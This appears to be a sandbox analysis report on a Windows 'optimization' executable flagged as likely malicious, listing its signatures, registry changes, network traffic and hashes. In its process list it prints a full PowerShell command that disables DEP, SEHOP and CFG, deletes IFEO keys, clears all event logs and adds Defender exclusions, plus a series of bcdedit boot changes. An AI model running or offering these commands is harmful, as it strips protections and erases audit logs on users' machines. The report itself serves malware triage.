Analysis Overview
SHA256
33f69f407d8ff31e83719e621aa3fdd5c5d6313dd26b7aab25ce6f631bdcbdef
Threat Level: Likely malicious
The file ET_Optimization_Program.exe was found to be: Likely malicious.
Malicious Activity Summary
Modifies boot configuration data using bcdedit
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-11 03:01
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 03:01
Reported
2024-06-11 03:04
Platform
win11-20240426-en
Max time kernel
115s
Max time network
116s
Command Line
Signatures
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "54" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ET_Optimization_Program.exe
"C:\Users\Admin\AppData\Local\Temp\ET_Optimization_Program.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ProcessMitigation -System -Disable DEP, SEHOP, AuditSEHOP, SEHOPTelemetry, CFG; Remove-Item -Path \'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*\' -Recurse -ErrorAction SilentlyContinue; Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }; Add-MpPreference -ExclusionPath $env:windir'\SoftwareDistribution\Datastore\Datastore.edb'; Add-MpPreference -ExclusionPath $env:windir'\SoftwareDistribution\Datastore\Logs\Edb *.jrs'; Add-MpPreference -ExclusionPath $env:windir'\SoftwareDistribution\Datastore\Logs\Edb.chk'; Add-MpPreference -ExclusionPath $env:windir'\SoftwareDistribution\Datastore\Logs\Tmp.edb'; Add-MpPreference -ExclusionPath $env:windir'\SoftwareDistribution\Datastore\Logs\*.log'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.edb'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.sdb'; Add-MpPreference -ExclusionPath $env:windir'\SoftwareDistribution\Datastore\Datastore.edb'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.log'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.chk'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.jrs'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.xml'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.csv'; Add-MpPreference -ExclusionPath $env:windir'\Security\Database\*.cmtx'; Add-MpPreference -ExclusionPath $env:windir'\apppatch\sysmain.sdb'; Add-MpPreference -ExclusionPath $env:windir'\EventLog\Data\lastalive?.dat'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\GroupPolicy\Machine\Registry.pol'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\GroupPolicy\Machine\Registry.tmp'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\sru\*.log'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\sru\*.dat'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\sru\*.chk'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\Configuration\MetaConfig.mof'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\winevt\Logs\*.evtx'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\Configuration\DSCStatusHistory.mof'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\Configuration\DSCEngineCache.mof'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\Configuration\DSCResourceStateCache.mof'; Add-MpPreference -ExclusionPath $env:SystemRoot'\System32\Configuration\ConfigurationStatus'; Add-MpPreference -ExclusionPath $env:userprofile'\AppData\Local\ETOptProgram\ETOptProgram.xml'
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /set useplatformtick yes
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue linearaddress57
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue increaseuserva
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue firstmegabytepolicy
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue avoidlowmemory
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue nolowmem
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue allowedinmemorysettings
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue x2apicpolicy
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue configaccesspolicy
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue MSI Default
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue usephysicaldestination
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue usefirmwarepcisettings
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue useplatformclock
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue disabledynamictick
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue vsmlaunchtype
C:\Windows\System32\bcdedit.exe
"C:\Windows\System32\bcdedit.exe" /deletevalue vm
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a1a855 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | browser.pipe.aria.microsoft.com | udp |
| GB | 88.221.135.35:443 | N/A | tcp |
| IE | 20.50.80.213:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.110.63.41.in-addr.arpa | udp |
| BE | 88.221.83.187:443 | r.bing.com | tcp |
| BE | 88.221.83.187:443 | r.bing.com | tcp |
| BE | 88.221.83.187:443 | r.bing.com | tcp |
| BE | 88.221.83.187:443 | r.bing.com | tcp |
| BE | 88.221.83.187:443 | r.bing.com | tcp |
| BE | 88.221.83.187:443 | r.bing.com | tcp |
| N/A | 20.42.73.25:443 | N/A | tcp |
Files
memory/4752-0-0x0000015291940000-0x000001529197A000-memory.dmp
memory/4752-1-0x00007FFB029C3000-0x00007FFB029C5000-memory.dmp
memory/4752-2-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-6-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-7-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-8-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/3576-11-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/3576-12-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/3576-18-0x0000021BF3F70000-0x0000021BF3F92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1ebbaqa.xnc.ps1
| Hash | Value |
| --- | --- |
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3576-22-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-23-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/3576-27-0x0000021BF4040000-0x0000021BF405E000-memory.dmp
memory/3576-30-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-31-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-32-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp
memory/4752-36-0x00007FFB029C0000-0x00007FFB03482000-memory.dmp